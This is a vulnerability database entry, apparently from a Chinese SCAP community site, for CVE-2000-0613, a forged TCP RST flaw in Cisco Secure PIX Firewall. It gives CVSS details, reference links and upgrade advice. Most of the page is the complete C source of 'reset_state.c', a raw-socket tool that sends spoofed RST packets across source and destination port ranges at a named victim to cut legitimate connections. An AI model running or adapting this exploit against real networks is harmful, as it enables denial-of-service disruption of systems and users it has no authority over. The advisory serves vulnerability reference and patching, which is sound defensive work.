CVE-2000-0613
CVSS5.0
发布时间 :2000-03-20 00:00:00
修订时间 :2008-09-10 15:05:12
NMCOE    

[原文]Cisco Secure PIX Firewall does not properly identify forged TCP Reset (RST) packets, which allows remote attackers to force the firewall to close legitimate connections.


[CNNVD]Cisco Secure PIX防火墙伪造TCP RST漏洞(CNNVD-200003-038)

        Cisco Secure PIX防火墙存在漏洞,不能正确辨识伪造的TCP置位包(RST),远程攻击者可以利用这个漏洞迫使防火墙关闭合法连接。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0613
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0613
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-038
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=B3D6883199DBD311868100A0C9FC2CDC046B72@protea.citec.net
(VENDOR_ADVISORY)  BUGTRAQ  20000320 PIX DMZ Denial of Service - TCP Resets
http://xforce.iss.net/static/4928.php
(UNKNOWN)  XF  cisco-pix-firewall-tcp
http://www.securityfocus.com/bid/1454
(UNKNOWN)  BID  1454
http://www.osvdb.org/1457
(UNKNOWN)  OSVDB  1457
http://www.cisco.com/warp/public/707/pixtcpreset-pub.shtml
(UNKNOWN)  CISCO  20000711 Cisco Secure PIX Firewall TCP Reset Vulnerability

- 漏洞信息

Cisco Secure PIX防火墙伪造TCP RST漏洞
中危 访问验证错误
2000-03-20 00:00:00 2005-07-27 00:00:00
远程※本地  
        Cisco Secure PIX防火墙存在漏洞,不能正确辨识伪造的TCP置位包(RST),远程攻击者可以利用这个漏洞迫使防火墙关闭合法连接。

- 公告与补丁

        Cisco plans to release updated PIX software to deal with these issues. See the Cisco advisory on this issue for details.

- 漏洞信息 (20067)

PIX Firewall 2.7/3.x/4.x/5 Forged TCP RST Vulnerability (EDBID:20067)
hardware remote
2000-07-10 Verified
0 Citec Network Securities
N/A [点击下载]
source: http://www.securityfocus.com/bid/1454/info

A connection through a Cisco Secure PIX Firewall can be reset by a third party if the source and destination IP addresses and ports of the connection can be determined or inferred. This can be accomplished by sending a forged TCP Reset (RST) packet to the firewall, containing the same source and destination addresses and ports (in the TCP packet header) as the connection to be disrupted. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this.


/* reset_state.c (c) 2000 Citec Network Securities */
/* The code following below is copyright Citec Network Securities */
/* Code was developed for testing, and is written to compile under */
/* FreeBSD */

#define __BSD_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>

struct slist {
	struct in_addr  spoof;
	struct slist   *link;
};					/* Spoof list */

int
main(int argc, char *argv[])
{

	int i, int2;
	int             sock;		/* Socket stuff */
	int             on = 1;		/* Socket stuff */
	struct sockaddr_in sockstruct;	/* Socket stuff */
	struct ip      *iphead;		/* IP Header pointer */
	struct tcphdr  *tcphead;	/* TCP Header pointer */
	char            evilpacket[sizeof(struct ip) + sizeof(struct
tcphdr)];
					/* Our reset packet */
	int             seq, ack;	/* Sequence and Acknowledgement #'s
*/
	FILE           *spooffile;	/* Spoof file */
	char           *buffer;		/* Spoof file read buffer */
	struct slist   *scur, *sfirst;	/* Spoof linked list pointers */
	char src[20], dst[20];		/* Work around for inet_ntoa static
*/
					/* Pointers when using printf() */
	int sourcefrom, sourceto, destfrom, destto;	/* CMD Line ports */
	int target;			/* Target address from inet_addr()
*/


	if(argc < 6) {
		fprintf(stderr, "Usage: %s spoof_file target sps spe dps
dpe\n"
		"target = your victim\n"
		"sps = Source port start\n"
		"spe = Source port end\n"
		"dps = Destination port start\n"
		"dpe = Destination port end\n", argv[0]);
		exit(-1);
		}
	else {
		sourcefrom = atoi(argv[3]);
		sourceto = atoi(argv[4]);
		destfrom = atoi(argv[5]);
		destto = atoi(argv[6]);
		};
	
	if(sourcefrom > sourceto) {
		printf("Error, start source port must be less than end
source port\n");
		exit(-1);
		}
	else if(destfrom > destto) {
		printf("Error, start dest port must be less than end dest
port\n");
		exit(-1);
		};

	printf("Used spoof file %s\n"
	       "Destination: [%s] ports: [%d -> %d]\n"
	       "Target source ports: [%d -> %d]\n",
		argv[1], argv[2], destfrom, destto, sourcefrom, sourceto);

	sleep(1);

	bzero(evilpacket, sizeof(evilpacket));
					/* Clean our reset packet */

	sfirst = malloc(sizeof(struct slist));
	scur = sfirst;
	scur->link = NULL;		/* Setup our spoof linked list */

	if(!(buffer = malloc(25))) {
		perror("malloc");
		exit(-1);
		};			/* Allocate for read buffer */

	if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
		perror("fopen");
		exit(-1);		/* Open our spoof file */
	} else {
		while (fgets(buffer, 25, spooffile)) { 	/* Read till EOF */
			if (!(inet_aton(buffer, &(scur->spoof))))
				printf("Invalid address found in victim
file.. ignoring\n");
			else {
				scur->link = malloc(sizeof(struct slist));
				scur = scur->link;
				scur->link = NULL;	/* Cycle l.list */
				}
			};		/* End of while loop */
		};		/* End of if {} else {} */
	

	free(buffer);			/* Free up our read buffer */
	fclose(spooffile);		/* Close our spoof file */
	scur = sfirst;			/* Set spoof list current to first
*/

	if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("socket");
		exit(-1);
	}				/* Allocate our raw socket */

	if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on,
sizeof(on)) < 0) {
		perror("setsockopt");
		exit(-1);
	}				/* Set socket options for raw iphead
*/

	sockstruct.sin_family = AF_INET;
	iphead = (struct ip *) evilpacket;
	tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
					/* Align ip and tcp headers */

	iphead->ip_hl = 5;		/* Ip header length is 5 */
	iphead->ip_v = 4;		/* ipv4 */
	iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
					/* Length of our total packet */
	iphead->ip_id = htons(getpid());	/* Packet ID == PID # */
	iphead->ip_ttl = 255;			/* Time to live == 255 */
	iphead->ip_p = IPPROTO_TCP;		/* TCP Packet */
	iphead->ip_sum = 0;			/* No checksum */
	iphead->ip_tos = 0;			/* 0 Type of Service */
	iphead->ip_off = 0;			/* Offset is 0 */
	tcphead->th_win = htons(512);		/* TCP Window is 512 */
	tcphead->th_flags = TH_RST;		/* Reset packet */
	tcphead->th_off = 0x50;			/* TCP Offset 0x50 */

	iphead->ip_dst.s_addr = inet_addr(argv[2]);

	srand(getpid());			/* Seed for rand() */
	while (scur->link != NULL) {
		seq = rand() % time(NULL);	/* Randomize our #'s */
		ack = rand() % time(NULL);	/* Randomize ack #'s */
		sockstruct.sin_port = htons(rand() % time(NULL));
		iphead->ip_src = scur->spoof;	/* Set the spoofed address
*/
		sockstruct.sin_addr = scur->spoof;
		for(i = sourcefrom; i <= sourceto; i++) {
			for(int2 = destfrom; int2 <= destto; int2++) {
				usleep(2);	/* Sleep 5ms between packets
*/
				seq += (rand() %10)+250;
				ack += (rand() %10)+250;
				tcphead->th_seq = htonl(seq);
						/* Set sequence number */
				tcphead->th_ack = htonl(ack);
						/* Set ack number */
				tcphead->th_dport = htons(int2);
						/* Set destination port */
				tcphead->th_sport = htons(i);
						/* Set source port */
				snprintf(src, 20, "%s",
inet_ntoa(iphead->ip_src));
				snprintf(dst, 20, "%s",
inet_ntoa(iphead->ip_dst));
				/* Copy info to src and dst for printing */
				printf("TCP RESET: [%s:%d] -> [%s:%d]\n",
src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport));
				sendto(sock, &evilpacket,
sizeof(evilpacket), 0x0,
			       		(struct sockaddr *) & sockstruct,
sizeof(sockstruct));
						/* Send our evil packet */
				};
			};
		scur = scur->link;		/* Cycle the spoof ips */
		}
		scur = sfirst;
	return (1);

};











		

- 漏洞信息

1457
Cisco PIX Firewall Forged TCP RST
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- 漏洞描述

Cisco PIX contains a flaw that may allow a malicious user to terminate connections. The issue is triggered when an attacker sends a forged RST packet. It is possible that the flaw may allow arbitrary connections to be reset resulting in a loss of availability.

- 时间线

2000-03-20 2000-03-20
Unknow Unknow

- 解决方案

Upgrade to version indicated by Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站